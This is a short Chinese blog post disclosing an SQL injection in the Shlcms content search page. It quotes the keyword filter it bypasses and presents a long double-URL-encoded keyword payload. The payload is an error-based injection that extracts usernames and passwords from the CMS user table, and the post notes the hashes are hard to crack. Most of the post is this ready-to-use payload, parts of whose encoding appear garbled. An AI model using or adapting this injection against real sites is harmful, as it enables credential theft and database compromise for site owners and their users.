Shlcms 注入漏洞

新的一年 也是自己的第16个生日,所以在今天写点自己挖的渣渣洞出来,祝自己生日快乐。
我不太会,所以只能挖这些渣渣咯
___________________________________________________________________________

新版的shlcms中

shlcmscontentsearchindex.php对keyword做了过滤
[attach]2546[/attach]
function checkSqlStr($string)
{
      $string = strtolower($string);
      return preg_match('/select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile|_user/i', $string);

}

因为会解码 所以无视过滤的 没过滤%就好

153856lo4024fummt30gm0

keyword=yu%25%2527%25%36%31%25%36%45%25%36%34%25%32%38%25%37%33%25%36%35%25%36%43%255%37%34%25%32%38%25%32%41%25%32%39%25%32%43%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%30%25%36%33%25%36%46%25%37%35%25%36%45%2%25%32%38%25%36%36%25%36%43%25%36%46%25%36%46%25%37%32%25%32%38%25%37%32%25%36%31%25%36%45%25%36%34%25%32%38%25%33%30%25%32%39%25%32%41%25%33%32%25%32%39%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%35%33%25%34%35%25%34%43%25%34%35%25%34%33%25%35%34%25%32%30%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%25%32%38%25%37%35%25%37%33%25%36%35%25%37%32%25%36%45%25%36%31%25%36%44%25%36%35%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%37%30%25%37%37%25%36%34%25%32%39%25%34%36%25%35%32%25%34%46%25%34%44%25%32%30%25%37%33%25%36%38%25%36%43%25%35%46%25%37%35%25%37%33%25%36%35%25%37%32%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%37%38%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%37%25%37%32%25%36%46%25%37%35%25%37%30%25%32%30%25%36%32%25%37%39%25%32%30%25%37%38%25%32%39%25%36%31%25%32%39%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%33%31%25%33%44%25%33%31%23

密码好像是sha1 +md5 加什么什么的 反正一般破不出来就对了。
作者:ebang

本文固定链接: https://www.unhonker.com/bug/1504.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2014年01月01日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Shlcms 注入漏洞 | 90' s Blog|关注网络信息安全
关键字:

Shlcms 注入漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!